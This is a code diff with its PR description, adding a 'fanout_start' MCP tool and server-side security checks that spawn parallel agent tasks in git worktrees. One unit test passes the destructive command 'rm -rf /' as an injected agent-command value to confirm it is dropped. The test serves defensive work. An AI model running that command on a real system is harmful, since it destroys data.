+    expect(again).toEqual(res);
+    expect(preflight).toHaveBeenCalledTimes(1);
+  });
+});

--- a/src/main/worktask/createFanOutService.ts
+++ b/src/main/worktask/createFanOutService.ts
@@ -1,0 +1,51 @@
+// FanOutService port assembly — the ONE place the service is constructed.
+//
+// Two front doors now reach fan-out: the renderer IPC handler (fanout.handler,
+// the GUI modal) and the pipe RPC handler (fanout.rpc, MCP clients). They MUST
+// share one instance: the §2 G1 idempotency guarantee is an INSTANCE property
+// (the key→result LRU and the in-flight set are instance fields), so a second
+// instance means the same idempotency key is accepted twice and the fan-out
+// runs twice — duplicate worktrees, duplicate workspaces, duplicate missions.
+//
+// The ports are the same two the service has always used: the daemon RPC port
+// (task.mission.start/update/close, a2a.channel.invite) and the renderer spawn
+// port (sendToRenderer('fanout.spawnWorkspace')).
+
+import type { BrowserWindow } from 'electron';
+import type { DaemonClient } from '../DaemonClient';
+import type { RpcMethod } from '../../shared/rpc';
+import { sendToRenderer } from '../pipe/handlers/_bridge';
+import { FanOutService } from './FanOutService';
+
+type GetWindow = () => BrowserWindow | null;
+
+/** Spawning can take seconds (PTY creation included), so the renderer spawn
+ *  round-trip gets a generous deadline. */
+const SPAWN_TIMEOUT_MS = 30000;
+
+export function createFanOutService(
+  getDaemonClient: () => DaemonClient | null,
+  getWindow: GetWindow,
+): FanOutService {
+  return new FanOutService({
+    daemon: {
+      rpc: async (method: string, params: Record<string, unknown>): Promise<unknown> => {
+        const dc = getDaemonClient();
+        if (!dc) throw new Error('Daemon not connected');
+        return dc.rpc(method as RpcMethod, params);
+      },
+    },
+    renderer: {
+      spawnWorkspace: async (p) => {
+        const res = (await sendToRenderer(getWindow, 'fanout.spawnWorkspace', p, {
+          timeoutMs: SPAWN_TIMEOUT_MS,
+        })) as { workspaceId?: string; ptyId?: string; error?: string };
+        if (res && typeof res.error === 'string') return { error: res.error };
+        if (res && typeof res.workspaceId === 'string') {
+          return { workspaceId: res.workspaceId, ...(res.ptyId ? { ptyId: res.ptyId } : {}) };
+        }
+        return { error: 'fanout.spawnWorkspace: renderer returned no workspaceId' };
+      },
+    },
+  });
+}

--- a/src/mcp/__tests__/fanout.test.ts
+++ b/src/mcp/__tests__/fanout.test.ts
@@ -1,0 +1,149 @@
+// Tests for the `fanout_start` MCP tool.
+//
+// The tool is a thin pass-through over `task.fanout.start` — the trust boundary
+// itself lives main-side (src/main/pipe/handlers/fanout.rpc.ts, tested in
+// fanout.rpc.test.ts). What matters HERE is the tool's shape:
+//
+//  1. It exposes no agent-command input. A schema field would invite callers to
+//     send a value that main ignores — and would read as if choosing the agent
+//     were supported.
+//  2. It attaches the server's verified senderPtyId, which is the entire
+//     identity basis main uses to pick the owning workspace AND the repository.
+//  3. It maps snake_case tool args onto the wire's camelCase params without
+//     inventing any.
+
+import { describe, expect, it, vi, beforeEach } from 'vitest';
+
+vi.mock('../wmux-client', () => ({
+  sendRpc: vi.fn(),
+  setClientIdentity: vi.fn(),
+  clearClientIdentity: vi.fn(),
+}));
+
+import { sendRpc } from '../wmux-client';
+import { registerFanOutTools } from '../fanout';
+import { FIRST_PARTY_METHODS } from '../../main/mcp/firstParty';
+
+const mockSendRpc = sendRpc as unknown as ReturnType<typeof vi.fn>;
+
+type ToolHandler = (args: Record<string, unknown>) => Promise<{
+  content: { type: 'text'; text: string }[];
+  isError?: boolean;
+}>;
+
+const shapes = new Map<string, Record<string, unknown>>();
+
+function collectTools(getSenderPtyId: () => string): Map<string, ToolHandler> {
+  const tools = new Map<string, ToolHandler>();
+  const server = {
+    tool: (name: string, _desc: string, schema: Record<string, unknown>, handler: ToolHandler) => {
+      tools.set(name, handler);
+      shapes.set(name, schema);
+    },
+  };
+  registerFanOutTools(server as never, { getSenderPtyId });
+  return tools;
+}
+
+const tools = collectTools(() => 'pty-mine');
+const fanoutStart = tools.get('fanout_start');
+if (!fanoutStart) throw new Error('fanout_start failed to register');
+
+beforeEach(() => {
+  mockSendRpc.mockReset();
+});
+
+describe('fanout_start: tool surface', () => {
+  it('registers', () => {
+    expect(fanoutStart).toBeDefined();
+  });
+
+  it('exposes NO agent-command input', () => {
+    const shape = shapes.get('fanout_start') ?? {};
+    for (const key of Object.keys(shape)) {
+      expect(key).not.toMatch(/agent|cmd|command/i);
+    }
+  });
+
+  it('exposes no workspace input either (identity is server-derived)', () => {
+    const shape = shapes.get('fanout_start') ?? {};
+    for (const key of Object.keys(shape)) {
+      expect(key).not.toMatch(/workspace/i);
+    }
+  });
+
+  it('is on the first-party allowlist (or it deadlocks under enforce mode)', () => {
+    expect(FIRST_PARTY_METHODS.has('task.fanout.start')).toBe(true);
+  });
+});
+
+describe('fanout_start: request mapping', () => {
+  it('maps snake_case args onto the wire params and attaches the verified ptyId', async () => {
+    mockSendRpc.mockResolvedValue({ ok: true, status: 'accepted', taskCount: 2 });
+    await fanoutStart({
+      idempotency_key: 'k1',
+      titles: ['a', 'b'],
+      prompt: 'shared',
+      task_prompts: ['pa', 'pb'],
+      repo_path: '/repo',
+    });
+    expect(mockSendRpc).toHaveBeenCalledWith('task.fanout.start', {
+      idempotencyKey: 'k1',
+      titles: ['a', 'b'],
+      prompt: 'shared',
+      taskPrompts: ['pa', 'pb'],
+      repoPath: '/repo',
+      senderPtyId: 'pty-mine',
+    });
+  });
+
+  it('omits optional params it was not given (rather than sending empties)', async () => {
+    mockSendRpc.mockResolvedValue({ ok: true, status: 'accepted', taskCount: 1 });
+    await fanoutStart({ idempotency_key: 'k2', titles: ['only'] });
+    const params = mockSendRpc.mock.calls[0][1] as Record<string, unknown>;
+    expect(params).toEqual({ idempotencyKey: 'k2', titles: ['only'], senderPtyId: 'pty-mine' });
+  });
+
+  it('never forwards an agent command even if one is somehow passed through', async () => {
+    mockSendRpc.mockResolvedValue({ ok: true, status: 'accepted', taskCount: 1 });
+    await fanoutStart({ idempotency_key: 'k3', titles: ['t'], agent_cmd: 'rm -rf /', agentCmd: 'rm -rf /' });
+    const params = mockSendRpc.mock.calls[0][1] as Record<string, unknown>;
+    expect(params.agentCmd).toBeUndefined();
+    expect(params.agent_cmd).toBeUndefined();
+  });
+
+  it('sends no senderPtyId when the walk missed (main then fails the call closed)', async () => {
+    const missTools = collectTools(() => '');
+    mockSendRpc.mockResolvedValue({ ok: false, error: { code: 'NOT_AUTHORIZED', message: 'no ptyId' } });
+    const res = await missTools.get('fanout_start')!({ idempotency_key: 'k4', titles: ['t'] });
+    const params = mockSendRpc.mock.calls[0][1] as Record<string, unknown>;
+    expect(params.senderPtyId).toBeUndefined();
+    expect(res.isError).toBe(true);
+  });
+});
+
+describe('fanout_start: result envelope', () => {
+  it('surfaces a typed rejection as isError with the code', async () => {
+    mockSendRpc.mockResolvedValue({
+      ok: false,
+      error: { code: 'NOT_AUTHORIZED', message: 'repoPath must resolve to your own repository' },
+    });
+    const res = await fanoutStart({ idempotency_key: 'k5', titles: ['t'] });
+    expect(res.isError).toBe(true);
+    expect(res.content[0].text).toContain('NOT_AUTHORIZED');
+  });
+
+  it('returns the accepted envelope verbatim on success', async () => {
+    mockSendRpc.mockResolvedValue({ ok: true, status: 'accepted', idempotencyKey: 'k6', taskCount: 3 });
+    const res = await fanoutStart({ idempotency_key: 'k6', titles: ['a', 'b', 'c'] });
+    expect(res.isError).toBeUndefined();
+    expect(JSON.parse(res.content[0].text)).toMatchObject({ status: 'accepted', taskCount: 3 });
+  });
+
+  it('reports a transport failure as isError rather than throwing', async () => {
+    mockSendRpc.mockRejectedValue(new Error('RPC timeout'));
+    const res = await fanoutStart({ idempotency_key: 'k7', titles: ['t'] });
+    expect(res.isError).toBe(true);
+    expect(res.content[0].text).toContain('RPC timeout');
+  });
+});

--- a/src/mcp/__tests__/index.channel.test.ts
+++ b/src/mcp/__tests__/index.channel.test.ts
@@ -85,6 +85,7 @@ const channelAck = tools.get('channel_ack');
 const channelUnread = tools.get('channel_unread');
 const channelMissionStart = tools.get('channel_mission_start');
 const channelMissionClose = tools.get('channel_mission_close');
+const channelMissionList = tools.get('channel_mission_list');
 
 if (
   !channelCreate ||
@@ -98,7 +99,8 @@ if (
   !channelAck ||
   !channelUnread ||
   !channelMissionStart ||
-  !channelMissionClose
+  !channelMissionClose ||
+  !channelMissionList
 ) {
   throw new Error('channel tools failed to register');
 }
@@ -140,10 +142,22 @@ describe('channel_* tools: registration', () => {
     expect(channelMissionClose).toBeDefined();
   });
 
-  it('does not register a channel_mission_list tool (list is pipe-only in J0)', () => {
-    // task.mission.list is a pipe RPC only; MCP exposure is deferred to J1
-    // (fan-out) per §3 tool-surface minimalism.
-    expect(tools.get('channel_mission_list')).toBeUndefined();
+  it('registers channel_mission_list (J1 — the deferral ends with fan-out)', () => {
+    // J0 kept task.mission.list pipe-only per §3 tool-surface minimalism and
+    // deferred the tool to J1. J1 (fan-out on the wire) is the caller that
+    // needs it: fanout_start returns before the tasks exist, so this listing is
+    // how a caller follows what it spawned.
+    expect(tools.get('channel_mission_list')).toBeDefined();
+  });
+
+  it('channel_mission_list is owner-scoped by the resolved workspace', async () => {
+    mockSendRpc.mockResolvedValue({ ok: true, tasks: [] });
+    const res = await channelMissionList({});
+    expect(mockSendRpc).toHaveBeenCalledWith('task.mission.list', {
+      workspaceId: 'ws-test',
+      verifiedWorkspaceId: 'ws-test',
+    });
+    expect(res.isError).toBeUndefined();
   });
 });
 

--- a/src/mcp/channels.ts
+++ b/src/mcp/channels.ts
@@ -545,4 +545,24 @@ export function registerChannelTools(server: McpServer, deps: ChannelToolDeps): 
       return callRpc('task.mission.close' as RpcMethod, params);
     },
   );
+
+  // ── channel_mission_list (WorkTask J0 read) ───────────────────────
+  // The read half of the mission surface: every WorkTask this workspace owns,
+  // with the materialised branch / worktreePath / paneGroupId fields. J0 shipped
+  // the RPC on the pipe but no tool over it, which left fan-out callers with no
+  // way to see what they spawned — this is that tool, and it is why fanout_start
+  // needs no status RPC of its own (fan-out tasks are born owned by the caller,
+  // and this listing is owner-scoped).
+  server.tool(
+    'channel_mission_list',
+    'List the missions (WorkTasks) your workspace owns, open and closed. Each entry carries taskId, title, status, its mission channel id, and — once materialised — the git branch, worktree path, and the workspace id of the pane group running it. This is how you follow a fan-out: after fanout_start reports "accepted", poll here to watch each task appear and materialise. Owner-scoped: you only ever see your own missions.',
+    {},
+    async () => {
+      const workspaceId = await deps.resolveWorkspaceId();
+      return callRpc('task.mission.list' as RpcMethod, {
+        workspaceId,
+        verifiedWorkspaceId: workspaceId,
+      });
+    },
+  );
 }

--- a/src/mcp/fanout.ts
+++ b/src/mcp/fanout.ts
@@ -1,0 +1,115 @@
+// ─── Fan-out tool for the bundled MCP server ────────────────────────────
+//
+// `fanout_start` exposes the `task.fanout.start` pipe RPC: one prompt → N
+// isolated git worktrees, each with its own workspace, agent pane and mission
+// channel. Until now fan-out was reachable only from the GUI modal, so an agent
+// supervising a fleet could not open one.
+//
+// The tool schema deliberately has NO agent-command, workspace or repository
+// input. Those are all derived server-side from the caller's verified identity
+// (see src/main/pipe/handlers/fanout.rpc.ts and
+// plans/fanout-mcp-surface-design.md); exposing them here would only invite
+// callers to send values that are ignored — or, for the agent command, would be
+// arbitrary command execution.
+//
+// The call is accept-then-poll. A fan-out takes far longer than the client's
+// RPC deadline, so the first call returns `accepted` and the work continues in
+// the background. Re-sending the same idempotency_key reports `running`, then
+// `completed` with the full per-task result.
+
+import type { McpServer } from '@modelcontextprotocol/sdk/server/mcp.js';
+import { z } from 'zod';
+import { sendRpc } from './wmux-client';
+import type { RpcMethod } from '../shared/rpc';
+import { FANOUT_MAX_TASKS, FANOUT_PROMPT_MAX_BYTES } from '../shared/workTask';
+
+/** Resolver the parent module injects (mirrors ChannelToolDeps). */
+export interface FanOutToolDeps {
+  /** The MCP server's OWN verified senderPtyId (its PID-map-walked ptyId, or ''
+   *  on miss). The main-side handler resolves this to the owning workspace and
+   *  derives the fan-out identity + repository from it. Fan-out fails closed
+   *  without a resolvable ptyId — there is no env-hint fallback, by design. */
+  getSenderPtyId?: () => string;
+}
+
+const FANOUT_START_SHAPE = {
+  idempotency_key: z
+    .string()
+    .min(1)
+    .describe(
+      'Required. Makes a retried start safe AND is the handle you poll this fan-out with: re-send the same key to get { status: "running" } and then { status: "completed", result }. Use a fresh key for a genuinely new fan-out.',
+    ),
+  titles: z
+    .array(z.string().min(1).max(256))
+    .min(1)
+    .max(FANOUT_MAX_TASKS)
+    .describe(
+      `One title per task; the array length IS the task count (max ${FANOUT_MAX_TASKS}). Each title seeds that task's branch name (wtask/<slug>) and its mission channel topic.`,
+    ),
+  prompt: z
+    .string()
+    .optional()
+    .describe(
+      `Shared prompt sent to every task. Optional: with no prompt at all, each task still gets its worktree, branch and agent pane, and you (or a human) type into them. Max ${FANOUT_PROMPT_MAX_BYTES} bytes.`,
+    ),
+  task_prompts: z
+    .array(z.string())
+    .max(FANOUT_MAX_TASKS)
+    .optional()
+    .describe(
+      'Per-task prompts, index-aligned with titles. Each task receives shared prompt + "\\n\\n" + its own prompt (empty side dropped). Use this for N different jobs; omit it for N attempts at the same job.',
+    ),
+  repo_path: z
+    .string()
+    .optional()
+    .describe(
+      'Optional and constrained: it may only name the repository your OWN workspace is already in (any subdirectory of it works). Omit it — the server uses your workspace repository regardless. A path in any other repository is rejected.',
+    ),
+};
+
+/** Register the fan-out tool on the given MCP server. */
+export function registerFanOutTools(server: McpServer, deps: FanOutToolDeps): void {
+  // Captured per registration, not a module global: the broker hosts many
+  // servers in one process, and a global would stamp every connection's
+  // fan-out with the last-registered connection's identity.
+  const resolveSenderPtyId = deps.getSenderPtyId ?? (() => '');
+
+  server.tool(
+    'fanout_start',
+    'Fan out one job into N isolated parallel tasks. Each task gets its own git worktree on a fresh wtask/ branch, its own wmux workspace with an agent pane already launched on the prompt, and its own mission channel. Use it to race N attempts at the same problem, or to run N independent jobs without them colliding in one checkout. ' +
+      `Up to ${FANOUT_MAX_TASKS} tasks per call. ` +
+      'Returns immediately with { status: "accepted" } — spawning takes far longer than one RPC, so the work continues in the background. Poll it by calling again with the SAME idempotency_key ("running", then "completed" with a per-task result), or watch the tasks appear via channel_mission_list. ' +
+      'The repository, the owning workspace and the agent command are all determined by the server from your verified identity: fan-out always runs in YOUR workspace\'s repository, and the tasks are owned by you. Fan-out is refused if your identity cannot be verified.',
+    FANOUT_START_SHAPE,
+    async ({ idempotency_key, titles, prompt, task_prompts, repo_path }) => {
+      const params: Record<string, unknown> = {
+        idempotencyKey: idempotency_key,
+        titles,
+      };
+      if (prompt !== undefined) params['prompt'] = prompt;
+      if (task_prompts !== undefined) params['taskPrompts'] = task_prompts;
+      if (repo_path !== undefined) params['repoPath'] = repo_path;
+      // The verified ptyId is the whole identity basis for this call — the
+      // handler resolves it to the owning workspace and refuses without it.
+      const pty = resolveSenderPtyId();
+      if (pty) params['senderPtyId'] = pty;
+
+      try {
+        const result = (await sendRpc('task.fanout.start' as RpcMethod, params)) as
+          | { ok: true; [k: string]: unknown }
+          | { ok: false; error: { code: string; message: string } }
+          | undefined;
+        if (result && result.ok === false) {
+          return {
+            content: [{ type: 'text' as const, text: `Error [${result.error.code}]: ${result.error.message}` }],
+            isError: true,
+          };
+        }
+        return { content: [{ type: 'text' as const, text: JSON.stringify(result ?? {}, null, 2) }] };
+      } catch (err) {
+        const message = err instanceof Error ? err.message : String(err);
+        return { content: [{ type: 'text' as const, text: `Error: ${message}` }], isError: true };
+      }
+    },
+  );
+}

--- a/src/mcp/index.ts
+++ b/src/mcp/index.ts
@@ -17,6 +17,7 @@ import { registerFileTools } from './playwright/tools/file';
 import { registerUtilityTools } from './playwright/tools/utility';
 import { registerExtractionTools } from './playwright/tools/extraction';
 import { registerChannelTools } from './channels';
+import { registerFanOutTools } from './fanout';
 import { registerPaneLifecycleTools } from './paneLifecycle';
 import { readFileSync } from 'fs';
 import { join } from 'path';
@@ -1369,6 +1370,14 @@ registerChannelTools(server, {
   resolveWorkspaceId: requireWorkspaceId,
   getSenderPtyId: () => MY_PTY_ID,
 });
+
+// === Fan-out tool (J1 on the wire) ===
+// Same provenance rule as the channel tools above, and for the same reason:
+// task.fanout.start derives the caller's workspace AND repository from this
+// ptyId, so it MUST stay MY_PTY_ID (walk-hit only). Feeding the weak
+// WMUX_PTY_ID env hint here would let a spoofable env var choose which
+// workspace's repository gets N new worktrees. No hit → fan-out fails closed.
+registerFanOutTools(server, { getSenderPtyId: () => MY_PTY_ID });
 
 // === Pane + surface lifecycle tools (issue #285) ===
 // Five MCP tools (pane_split / pane_close / pane_focus, surface_new /

--- a/src/shared/rpc.ts
+++ b/src/shared/rpc.ts
@@ -355,7 +355,14 @@ export type RpcMethod =
   | 'task.mission.list'
   // J1 §5 — 물질화 필드(branch/worktreePath/paneGroupId) 단조 커밋. FanOutService
   // 내부 경로가 호출한다(owner OR CEO authz는 데몬 WorkTaskService에서 강제).
-  | 'task.mission.update';
+  | 'task.mission.update'
+  // Fan-out on the pipe surface: one prompt → N isolated worktree tasks. The
+  // wire contract is deliberately narrower than the renderer IPC one — the
+  // agent command, the caller's workspace and the repository are all
+  // server-derived, never read from params. Accept-then-poll: re-send the same
+  // idempotencyKey to read running/completed state. See
+  // plans/fanout-mcp-surface-design.md.
+  | 'task.fanout.start';
 
 // All available methods as array (for system.capabilities)
 export const ALL_RPC_METHODS = [
@@ -504,6 +511,7 @@ export const ALL_RPC_METHODS = [
   'task.mission.close',
   'task.mission.list',
   'task.mission.update',
+  'task.fanout.start',
 ] as const satisfies readonly RpcMethod[];
 
 // === RPC Parameter Types ===


### PR DESCRIPTION
Fan-out — one prompt split into N isolated parallel tasks, each with its own git worktree on a fresh branch, its own workspace with an agent already launched, and its own mission channel — was reachable only from the GUI modal. `fanout.handler.ts` is a renderer-only `ipcMain` surface with no `RpcRouter` registration, so an MCP client could not open one. Given that "wmux exposes itself as MCP" is one of the two differentiators still standing, the marquee journey being absent from it is the gap this closes.

## What lands

- `task.fanout.start` on the pipe router.
- `fanout_start` MCP tool.
- `channel_mission_list` MCP tool — a wrapper over the **existing** `task.mission.list` RPC, which was already pipe-registered. **No new query RPC was added**: fan-out tasks are born owned by the caller and `task.mission.list` is owner-scoped, so a caller's fan-out tasks are exactly its mission list, including the materialised `branch` / `worktreePath` / `paneGroupId`. J0 had deliberately deferred this tool "to J1"; this is J1.
- `FanOutService` is now constructed once and injected into both front doors.

Out of scope, as agreed: diff adoption, PR creation, task close from the wire.

## Security requirements

The wire contract is deliberately narrower than the renderer IPC one. The IPC path trusts every field because a human typed it into the modal; the wire does not. The handler therefore builds the `FanOutRequest` field by field from a strict subset of caller input plus server-derived values — `params` is never spread, so a field added to the wire later cannot leak through by accident.

| # | Requirement | How it is met | Test |
|---|---|---|---|
| 1 | `agentCmd` never accepted from the wire | Not an input. `FANOUT_WIRE_AGENT_CMD` is set unconditionally. It is interpolated verbatim into `` `${agentCmd} "$(cat '<path>')"` `` and written to a PTY, so accepting one would be arbitrary command execution. A sent value is ignored rather than rejected (no field-existence oracle, no break for clients mirroring the IPC shape); the tool schema has no such field. The renderer IPC path is untouched. | `R1` — ignores an injection payload, and ignores a plausible-looking one |
| 2 | `verifiedWorkspaceId` derived from ctx, not params | Resolved from a verified `senderPtyId` via the renderer's `input.findOwnerWorkspace` — the same D5 anchor `a2a.channel.*` mutations use. An unresolvable caller is refused outright. `memberId` is likewise not read (it defaults to the resolved workspace). `ws-human` is rejected for symmetry with the channel handler. | `R2` — caller-supplied ws id ignored; unresolvable / absent ptyId / reserved workspace all refused |
| 3 | `repoPath` confined to the caller's own repo | The fan-out repo is `git rev-parse --show-toplevel` of the caller workspace's own `metadata.cwd`, realpath'd. A supplied `repoPath` may only re-state that same repository, compared as realpath'd **toplevels** — not a prefix match, which `..` and symlinks defeat, and which would reject a legitimate subdirectory. The caller's string is never forwarded; the normalised root is. No fallback to "the active workspace". | `R3` — foreign repo, non-repo, non-string and flag-shaped paths refused; own subdirectory accepted but normalised; missing cwd and non-repo cwd refused |
| 4 | origin allowlist, fail-closed | `ctx?.origin === 'local'` or reject, verbatim from the a2a execute precedent. `origin` is a required `RpcContext` field, so a future LAN transport cannot inherit fan-out by forgetting to classify itself. | `R4` — remote and context-less refused, **and** refused before any identity or repo resolution runs |
| 5 | N capped server-side | Same `FANOUT_MAX_TASKS` the GUI enforces, checked at the handler before the service is entered: the rejection is wire-shaped, and the raw array length is bounded before any per-element work. `taskPrompts` capped too. | `R5` — over-cap, 5000-entry array, over-cap `taskPrompts`, zero usable titles, non-array |
| 6 | prompt / title caps server-side | Each task's *effective* prompt (shared + per-task, the exact rule the service applies) capped at `FANOUT_PROMPT_MAX_BYTES` in **UTF-8 bytes**; each title at `CHANNEL_TOPIC_MAX`, the daemon's own limit, so N-1 tasks are not spawned before task N is rejected downstream. All-or-nothing, matching the service's existing contract. | `R6` — oversized shared prompt, oversized combination, byte-vs-character, over-long title |
| 7 | approval gate | **Not added, deliberately.** Reasoning below. | — |

### On requirement 7

Fan-out spawns `claude "$(cat <prompt>)"` into a fresh PTY — an ordinary interactive session with its own downstream permission prompts. That is not the a2a execute path, which spawns a headless worker in `bypassPermissions`; the existing gate exists precisely because that mode has no downstream prompts.

With requirements 1–6 applied, the only primitive fan-out adds over what a caller reaching this method already holds on the same router (`input.send`, which types *any* command into a pane; `mcp.claimWorkspace`; `pane.split`; `task.mission.start`) is `git worktree add` on the caller's own repo, ≤8 per call, into `~/.wmux/worktrees/`, on a fresh `wtask/*` branch that must not already exist. No commits, no ref rewrites, preserved rather than deleted on failure. Gating that while `input.send` stays ungated would be incoherent.

There is also a concrete cost: the call is asynchronous (below), so a prompt would fire *after* the tool returned, and the existing gate auto-denies after 30s — an unattended fleet would silently lose every fan-out. And reusing `requestExecuteApproval` verbatim would fold fan-out under the user's existing `a2aAutoApproveExecute` toggle, silently widening a setting agreed to for a different action.

Fan-out is loud rather than silent: N workspaces in the sidebar, N missions in the Missions section, one audited mission channel each, bounded by `WORKTASK_MAX_OPEN_PER_WORKSPACE`. **If you want a gate anyway**, the reuse path is a renderer round-trip into `requestExecuteApproval` with a `kind: 'fanout'` discriminator so the dialog copy stays truthful — deliberately left out because it touches the store, the dialog, the approval inbox and i18n, and should be a decision rather than a side effect.

## Accept-then-poll

`wmux-client.ts` sets a hard 10s RPC deadline, and a single task's renderer spawn alone is allowed 30s. A synchronous fan-out would time out by construction and the client's retry would re-fire it. So the call accepts, runs detached, and the caller polls by re-sending the same `idempotencyKey` — which falls straight out of the idempotency LRU the service already maintains (`accepted` → `running` → `completed` with the full result). `idempotencyKey` is therefore required on the wire.

Two small service additions serve this: `statusOf(key)`, and `start()` recording a failed result instead of releasing the key when `run()` throws — releasing it would let a poll **restart** a fan-out that had already spawned tasks. The GUI is unaffected (it mints a fresh key per submit).

## One service, two front doors

The idempotency LRU and in-flight set are **instance** fields, so two instances mean one key accepted twice and the fan-out running twice. The port assembly moves to `createFanOutService.ts`, `main/index.ts` constructs it once, and both registrars receive the same binding. A source-level test pins this, since no unit test can exercise the wiring.

## Not touched

`COMMANDER_RPC_METHODS` — the commander brain's allow lane stays as-is (it supervises; it does not need to spawn worktrees). `COMMANDER_TEARDOWN_DENY` — fan-out has no teardown effect.

## Verification

`tsc --noEmit` clean; `npm test` green (8777 passed / 23 skipped, plus 88 runtime). `docs/api/reference.md` regenerated for the new method. Design notes in `plans/fanout-mcp-surface-design.md`.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

- **New Features**
  - Added the `fanout_start` MCP tool for initiating parallel tasks across workspaces.
  - Added `channel_mission_list` to view active and completed mission tasks.
  - Fan-out requests now return immediately with an accepted status and support progress polling.
  - Added safeguards for caller identity, repository scope, request size, and duplicate submissions.

- **Documentation**
  - Updated the API reference and changelog with the new fan-out capability and usage flow.
  - Added design documentation describing the fan-out workflow and security controls.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->